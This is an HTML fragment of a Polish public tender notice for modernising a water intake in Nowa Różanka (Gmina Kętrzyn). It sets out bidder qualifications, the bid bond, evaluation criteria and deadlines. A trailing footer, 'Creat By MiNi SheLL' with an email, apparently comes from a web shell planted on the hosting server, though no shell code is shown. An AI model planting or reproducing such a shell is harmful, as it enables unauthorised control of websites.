              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                 Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej  na kwotę nie mniejszą niż 50.000 zł;<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                   Za minimalny poziom zdolności uznane zostanie, wykazanie przez Wykonawcę, że:

- nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co  najmniej         2  roboty  budowlane  o  wartości  minimum  100 000,00  złotych każda, zbliżone  do  przedmiotu zamówienia,  tj.   polegające na wykonaniu   odwiertów  lub   rekonstrukcji studni głębinowych o głębokości  co  najmniej  70  m . W przypadku, gdy wykonawca polega na zasobach innych podmiotów przy wykazaniu spełniania warunku doświadczenia, zobowiązany jest wykazać udział tych podmiotów w wykonaniu zamówienia.

UWAGA: W przypadku podania wartości robót budowlanych w walucie innej niż PLN, w celu oceny spełniania ww. warunku, Zamawiający dokona przeliczenia wskazanej kwoty  na PLN według średniego kursu Narodowego Banku Polskiego obowiązującego w dniu publikacji ogłoszenia o niniejszym zamówieniu w Biuletynie Zamówień Publicznych.

- skieruje do realizacji zamówienia  co najmniej  jedną  osobę   posiadającą uprawnienia : 

    1) geologiczne w  zakresie  wykonywania  dozoru  i  kierowania  pracami  geologicznymi, wymagane  ustawą  z  dnia    9  czerwca  2011  r.      Prawo geologiczne  i  górnicze    (  tekst jednolity  Dz.  U.  z  2016  r.  poz.  1131  )  lub   inne   uprawnienia umożliwiające wykony-wanie tych samych czynności  w aktualnym stanie prawnym, w zakresie odpowiednim do zakresu zamówienia;

   2) do kierowania robotami  budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych lub inne   uprawnienia budowlane umożliwiające wykonywanie tych samych czynności  w aktualnym stanie prawnym, w zakresie odpowiednim do zakresu zamówienia;

  3) do kierowania robotami  budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i  urządzeń elektrycznych i elektroenergetycznych lub inne   uprawnienia budowlane umożliwiające wykonywanie tych samych czynności  w aktualnym stanie prawnym, w zakresie odpowiednim do zakresu zamówienia;

osoby wymienione wyżej muszą spełniać warunki do wykonywania w/w  funkcji, określone w przepisach prawa;  
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy, Zamawiający zażąda oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej o której mowa w art. 22 ust. 1 pkt 23 ustawy Pzp zgodnie ze wzorem stanowiącym załącznik nr 7 do SIWZ. Wraz ze złożeniem oświadczenia, Wykonawca może złożyć dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1. W celu wykazania spełniania warunku udziału w postępowaniu wskazanego w ppkt 7.4.b siwz wykonawca złoży oryginał lub kopię polisy ubezpieczenia, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej.
2. W celu wykazania spełniania warunku udziału w postępowaniu wskazanego w ppkt 7.4.c wykonawca złoży:

- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie,  z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów (np. zaświadczeń, referencji), określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, według wzoru stanowiącego załącznik nr 5 do SIWZ;

- wykaz osób skierowanych do realizacji zamówienia z podaniem imienia i nazwiska, informacji na temat  kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, zakresu wykonywanych czynności, informacji o podstawie do dysponowania tymi osobami, wraz z oświadczeniem o skierowaniu do realizacji zamówienia osoby posiadającej następujące uprawnienia, tj. :

    a) geologiczne w  zakresie  wykonywania  dozoru  i  kierowania  pracami  geologicznymi, wymagane  ustawą  z  dnia    9  czerwca  2011  r.      Prawo geologiczne  i  górnicze    (  tekst jednolity  Dz.  U.  z  2016  r.  poz.  1131  )  lub   inne   uprawnienia umożliwiające wykony-wanie tych samych czynności  w aktualnym stanie prawnym, w zakresie odpowiednim do zakresu zamówienia;
   b) do kierowania robotami  budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych lub inne   uprawnienia budowlane umożliwiające wykonywanie tych samych czynności  w aktualnym stanie prawnym, w zakresie odpowiednim do zakresu zamówienia;

  c) do kierowania robotami  budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i  urządzeń elektrycznych i elektroenergetycznych lub inne   uprawnienia budowlane umożliwiające wykonywanie tych samych czynności  w aktualnym stanie prawnym, w zakresie odpowiednim do zakresu zamówienia;

 wzór wykazu i oświadczenia stanowi załącznik Nr 6 do SIWZ.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Nie wymagane.</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">
- wypełniony i podpisany Formularz ofertowy,
- stosowne pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika wprost z dokumentów rejestracyjnych firmy, 
- pełnomocnictwo dla lidera w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia - podpisane przez wszystkich wykonawców ubiegających się o udzielenie zamówienia,
- KOSZTORYS OFERTOWY sporządzony metodą uproszczoną na podstawie przedmiarów robót, projektu budowlano-wykonawczego oraz specyfikacji technicznej wykonania i odbioru robót stanowiących załączniki do Opisu przedmiotu zamówienia ( załącznik nr 1 do  SIWZ); kosztorys nie będzie podlegać sprawdzeniu i służyć będzie, jako element pomocniczy,
- dowód wniesienia wadium,
- Oświadczenia i Dokumenty jakie mają dostarczyć Wykonawcy 
zgodnie z wymogami SIWZ, w celu potwierdzenia spełniania warunków udziału         w postępowaniu oraz potwierdzające brak podstaw do wykluczenia z postępowania ;</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />
1. Wadium należy wnieść przed upływem terminu składania ofert.

2. Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego jest zobowiązany wnieść wadium w wysokości 5 000,-zł (słownie: pięć tysięcy) w formach określonych w art. 45 ust. 6 ustawy. Konieczne jest dołączenie do oferty kopii polecenia przelewu potwierdzonej przez Wykonawcę, w przypadku formy pieniężnej wadium. 
W przypadku wyboru formy niepieniężnej wadium, oryginał dokumentu potwierdzający wniesienie wadium należy załączyć do oferty. 

3. Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania wynikające z ustawy, w szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze żądanie Zamawiającego, w przypadkach określonych w ustawie oraz być ważne przez okres związania ofertą, określony w niniejszej specyfikacji.

4. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Nr 71 2030 0045 1110 0000 0287 4780, z tytułem: WADIUM Modernizacja ujęcia wody w miejscowości Nowa Różanka, Gmina Kętrzyn, działka Nr 132/1. 
Za skuteczne wniesienie wadium w pieniądzu Zamawiający uzna wadium, które w wymaganym terminie wniesienia znajdować się będzie się na rachunku bankowym Zamawiającego.

5. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. 

6.  Zwrot wadium nastąpi zgodnie z art. 46 ust. 1, 1a, 2 i 4  ustawy.

7. Zatrzymanie wadium nastąpi w przypadkach wynikających z art. 46 ust. 4a i 46 ust. 5 ustawy.

8.Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.

9. Oferty wykonawców, którzy nie wniosą wadium lub wniosą wadium w sposób niezgodny z SIWZ, zostaną odrzucone na podstawie art. 89 ust. 1 pkt 7b ustawy.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena brutto</td><td>0.60</td></tr><tr><td>Termin realizacji</td><td>0.20</td></tr><tr><td>Okres gwarancji i wydłużenie rękojmi</td><td>0.20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                nie
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość zmiany istotnych postanowień umownych związanych z:
a) zmianą wysokości stawki podatku VAT w trakcie realizacji zamówienia - zmiana ceny o zmianę w kwocie podatku;
b) terminem realizacji zamówienia w przypadku zaistnienia następujących okoliczności:
-w następstwie wykraczających poza terminy określone w KPA procedur administracyjnych oraz innych terminów formalno-prawnych mających wpływ na terminy realizacji zamówienia, a nie wynikających z przyczyn leżących po stronie Wykonawcy;
-zmiany przepisów prawnych istotnych dla realizacji przedmiotu umowy 
i mających wpływ na termin wykonania przedmiotu zamówienia;
-ujawnienia wad opracowania projektowego, o których Zamawiający nie posiadał wiedzy wcześniej;
-czasu działania siły wyższej mającej bezpośredni wpływ na terminowość wykonania robót, w takiej sytuacji wykonawca jest obowiązany na czas działania siły wyższej zabezpieczyć teren budowy przed niepożądanym jej działaniem;
-niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych lub przeprowadzanie prób i sprawdzeń, lub dokonywanie odbiorów, w szczególności temperatury powietrza poniżej 0 stopni C, wiatru uniemożliwiającego pracę maszyn budowlanych, gwałtownych opadów; w takiej sytuacji wykonawca jest obowiązany  zabezpieczyć teren budowy przed niepożądanym działaniem warunków atmosferycznych.
Wszelkie zmiany i uzupełnienia umowy wymagają formy pisemnej pod rygorem nieważności, za zgodą obu stron.
Wszelkie zmiany muszą być dokonywane z zachowaniem przepisu art. 140 ust.1 i art. 140 ust. 3 ustawy Pzp stanowiącego, że umowa podlega unieważnieniu w części wykraczającej poza określenie przedmiotu zamówienia zawartego w SIWZ.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/10/2016, godzina: 11:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com